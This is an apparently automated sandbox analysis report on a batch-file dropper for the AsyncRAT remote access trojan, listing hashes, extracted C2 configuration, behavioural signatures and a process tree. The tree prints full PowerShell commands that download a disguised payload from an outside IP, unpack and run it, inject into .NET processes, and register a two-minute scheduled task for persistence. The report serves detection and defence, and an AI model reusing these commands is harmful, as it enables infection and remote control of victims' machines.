Analysis
-
max time kernel
135s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-11-2024 08:01
Static task
static1
Behavioral task
behavioral1
Sample
Sat.bat
Resource
win7-20241010-en
General
-
Target
Sat.bat
-
Size
2KB
-
MD5
0e2fff554ddadc58aaff7978ec06aa32
-
SHA1
b453b17905235ea96150c90711285f7879d3afc0
-
SHA256
64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80
-
SHA512
c54cc4c956dc733835d0d40d49377b23b8b63bfa118e0e9ed5bba18e2b2b5f4a33656cd5b75230cd7dec05a98a3bc4b84b429121cffe3644fff72fc628b83b76
Malware Config
Extracted
http://109.199.101.109:770/xx.jpg
Extracted
asyncrat
AWS | 3Losh
Default
samsalah1.freeddns.org:1005
AsyncMutex_alosh
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1184 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
AutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exepid process 2532 AutoHotkey64.exe 4356 AutoHotkey64.exe 3472 AutoHotkey64.exe 2896 AutoHotkey64.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 1184 powershell.exe 4704 powershell.exe 4120 powershell.exe 876 powershell.exe -
Suspicious use of SetThreadContext 33 IoCs
Processes:
AutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exedescription pid process target process PID 4356 set thread context of 1816 4356 AutoHotkey64.exe RegAsm.exe PID 3472 set thread context of 1752 3472 AutoHotkey64.exe RegAsm.exe PID 4356 set thread context of 1196 4356 AutoHotkey64.exe RegAsm.exe PID 4356 set thread context of 4048 4356 AutoHotkey64.exe RegAsm.exe PID 3472 set thread context of 5028 3472 AutoHotkey64.exe RegAsm.exe PID 4356 set thread context of 1788 4356 AutoHotkey64.exe RegAsm.exe PID 3472 set thread context of 1820 3472 AutoHotkey64.exe RegAsm.exe PID 3472 set thread context of 1364 3472 AutoHotkey64.exe RegAsm.exe PID 3472 set thread context of 1432 3472 AutoHotkey64.exe AppLaunch.exe PID 3472 set thread context of 2552 3472 AutoHotkey64.exe AppLaunch.exe PID 4356 set thread context of 744 4356 AutoHotkey64.exe AppLaunch.exe PID 4356 set thread context of 1676 4356 AutoHotkey64.exe AppLaunch.exe PID 3472 set thread context of 2236 3472 AutoHotkey64.exe AppLaunch.exe PID 4356 set thread context of 4420 4356 AutoHotkey64.exe aspnet_compiler.exe PID 3472 set thread context of 4276 3472 AutoHotkey64.exe aspnet_compiler.exe PID 4356 set thread context of 4240 4356 AutoHotkey64.exe aspnet_compiler.exe PID 3472 set thread context of 2428 3472 AutoHotkey64.exe aspnet_compiler.exe PID 4356 set thread context of 3232 4356 AutoHotkey64.exe aspnet_compiler.exe PID 3472 set thread context of 1888 3472 AutoHotkey64.exe aspnet_compiler.exe PID 4356 set thread context of 4984 4356 AutoHotkey64.exe aspnet_compiler.exe PID 3472 set thread context of 5072 3472 AutoHotkey64.exe cvtres.exe PID 4356 set thread context of 2292 4356 AutoHotkey64.exe cvtres.exe PID 3472 set thread context of 1168 3472 AutoHotkey64.exe cvtres.exe PID 4356 set thread context of 1464 4356 AutoHotkey64.exe cvtres.exe PID 3472 set thread context of 3028 3472 AutoHotkey64.exe InstallUtil.exe PID 4356 set thread context of 2188 4356 AutoHotkey64.exe InstallUtil.exe PID 3472 set thread context of 1760 3472 AutoHotkey64.exe InstallUtil.exe PID 2896 set thread context of 3520 2896 AutoHotkey64.exe RegAsm.exe PID 2896 set thread context of 3644 2896 AutoHotkey64.exe RegAsm.exe PID 2896 set thread context of 5048 2896 AutoHotkey64.exe RegAsm.exe PID 2896 set thread context of 1620 2896 AutoHotkey64.exe RegAsm.exe PID 2896 set thread context of 364 2896 AutoHotkey64.exe AppLaunch.exe PID 2896 set thread context of 5064 2896 AutoHotkey64.exe AppLaunch.exe -
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
RegAsm.exeAppLaunch.exeAppLaunch.execvtres.exeRegAsm.exeaspnet_compiler.exeaspnet_compiler.exeRegAsm.exeRegAsm.exeRegAsm.execvtres.exeInstallUtil.exeAppLaunch.exeaspnet_compiler.execvtres.exeInstallUtil.exeRegAsm.exeAppLaunch.exeaspnet_compiler.exeaspnet_compiler.exeRegAsm.exeRegAsm.exeRegAsm.exeAppLaunch.exeaspnet_compiler.exeRegAsm.exeRegAsm.exeaspnet_compiler.execvtres.exeInstallUtil.exeRegAsm.exeAppLaunch.exeAppLaunch.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1924 timeout.exe -
Suspicious behavior: EnumeratesProcesses 56 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeAutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exepid process 876 powershell.exe 876 powershell.exe 1184 powershell.exe 1184 powershell.exe 4120 powershell.exe 4120 powershell.exe 4704 powershell.exe 4704 powershell.exe 4356 AutoHotkey64.exe 4356 AutoHotkey64.exe 3472 AutoHotkey64.exe 3472 AutoHotkey64.exe 4356 AutoHotkey64.exe 4356 AutoHotkey64.exe 4356 AutoHotkey64.exe 4356 AutoHotkey64.exe 4356 AutoHotkey64.exe 4356 AutoHotkey64.exe 3472 AutoHotkey64.exe 3472 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 876 powershell.exe Token: SeDebugPrivilege 1184 powershell.exe Token: SeDebugPrivilege 4120 powershell.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeDebugPrivilege 1196 RegAsm.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
AutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exepid process 2532 AutoHotkey64.exe 4356 AutoHotkey64.exe 2532 AutoHotkey64.exe 3472 AutoHotkey64.exe 4356 AutoHotkey64.exe 3472 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe -
Suspicious use of SendNotifyMessage 8 IoCs
Processes:
AutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exeAutoHotkey64.exepid process 2532 AutoHotkey64.exe 4356 AutoHotkey64.exe 2532 AutoHotkey64.exe 3472 AutoHotkey64.exe 4356 AutoHotkey64.exe 3472 AutoHotkey64.exe 2896 AutoHotkey64.exe 2896 AutoHotkey64.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.execmd.exeAutoHotkey64.exeAutoHotkey64.exedescription pid process target process PID 3428 wrote to memory of 876 3428 cmd.exe powershell.exe PID 3428 wrote to memory of 876 3428 cmd.exe powershell.exe PID 876 wrote to memory of 4840 876 powershell.exe cmd.exe PID 876 wrote to memory of 4840 876 powershell.exe cmd.exe PID 4840 wrote to memory of 1184 4840 cmd.exe powershell.exe PID 4840 wrote to memory of 1184 4840 cmd.exe powershell.exe PID 4840 wrote to memory of 4120 4840 cmd.exe powershell.exe PID 4840 wrote to memory of 4120 4840 cmd.exe powershell.exe PID 4840 wrote to memory of 1924 4840 cmd.exe timeout.exe PID 4840 wrote to memory of 1924 4840 cmd.exe timeout.exe PID 4840 wrote to memory of 2532 4840 cmd.exe AutoHotkey64.exe PID 4840 wrote to memory of 2532 4840 cmd.exe AutoHotkey64.exe PID 4840 wrote to memory of 4356 4840 cmd.exe AutoHotkey64.exe PID 4840 wrote to memory of 4356 4840 cmd.exe AutoHotkey64.exe PID 4840 wrote to memory of 3472 4840 cmd.exe AutoHotkey64.exe PID 4840 wrote to memory of 3472 4840 cmd.exe AutoHotkey64.exe PID 4840 wrote to memory of 3900 4840 cmd.exe schtasks.exe PID 4840 wrote to memory of 3900 4840 cmd.exe schtasks.exe PID 4840 wrote to memory of 4704 4840 cmd.exe powershell.exe PID 4840 wrote to memory of 4704 4840 cmd.exe powershell.exe PID 4356 wrote to memory of 1816 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1816 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1816 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1816 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1816 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1816 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1816 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1816 4356 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 1752 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 1752 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 1752 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 1752 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 1752 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 1752 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 1752 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 1752 3472 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1196 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1196 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1196 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1196 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1196 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1196 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1196 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1196 4356 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 1132 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 1132 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 1132 3472 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 4048 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 4048 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 4048 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 4048 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 4048 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 4048 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 4048 4356 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 4048 4356 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 5028 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 5028 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 5028 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 5028 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 5028 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 5028 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 5028 3472 AutoHotkey64.exe RegAsm.exe PID 3472 wrote to memory of 5028 3472 AutoHotkey64.exe RegAsm.exe PID 4356 wrote to memory of 1788 4356 AutoHotkey64.exe RegAsm.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Sat.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Sat.bat' -ArgumentList 'minimized' -WindowStyle Minimized"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sat.bat" minimized "3⤵
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://109.199.101.109:770/xx.jpg', 'C:\Users\Admin\Documents\x.zip')"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'C:\Users\Admin\Documents\x.zip' -DestinationPath 'C:\Users\Admin\Documents'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak4⤵
- Delays execution with timeout.exe
PID:1924
-
-
C:\Users\Admin\Documents\AutoHotkey64.exe"C:\Users\Admin\Documents\AutoHotkey64.exe"4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2532
-
-
C:\Users\Admin\Documents\AutoHotkey64.exe"C:\Users\Admin\Documents\AutoHotkey64.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1816
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4048
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1788
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:4252
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵PID:4736
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- System Location Discovery: System Language Discovery
PID:744
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1676
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵PID:1408
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4420
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵PID:3104
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4240
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3232
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4984
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵PID:4400
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵PID:2444
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2292
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1464
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵PID:1344
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵PID:2064
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2188
-
-
-
C:\Users\Admin\Documents\AutoHotkey64.exe"C:\Users\Admin\Documents\AutoHotkey64.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1752
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:1132
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5028
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1820
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1364
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1432
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2552
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵PID:4504
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵PID:2036
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2236
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵PID:4640
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4276
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2428
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1888
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵PID:1952
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5072
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵PID:4428
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1168
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"5⤵PID:2320
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵PID:3724
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3028
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵PID:2772
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
PID:1760
-
-
-
C:\Windows\system32\schtasks.exeschtasks /Query /TN "alosh"4⤵PID:3900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "$tr = New-Object -ComObject Schedule.Service; " "$tr.Connect(); " "$ta = $tr.NewTask(0); " "$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; " "$ta.Settings.Enabled = $true; " "$ta.Settings.DisallowStartIfOnBatteries = $false; " "$st = $ta.Triggers.Create(1); " "$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); " "$st.Repetition.Interval = 'PT2M'; " "$md = $ta.Actions.Create(0); " "$md.Path = 'C:\Users\Admin\\Documents\\AutoHotkey64.exe'; " "$ns = $tr.GetFolder('\'); " "$ns.RegisterTaskDefinition('alosh', $ta, 6, $null, $null, 3);"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
-
-
C:\Users\Admin\Documents\AutoHotkey64.exeC:\Users\Admin\\Documents\\AutoHotkey64.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2896 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3520
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3644
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- System Location Discovery: System Language Discovery
PID:5048
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:4984
-
-
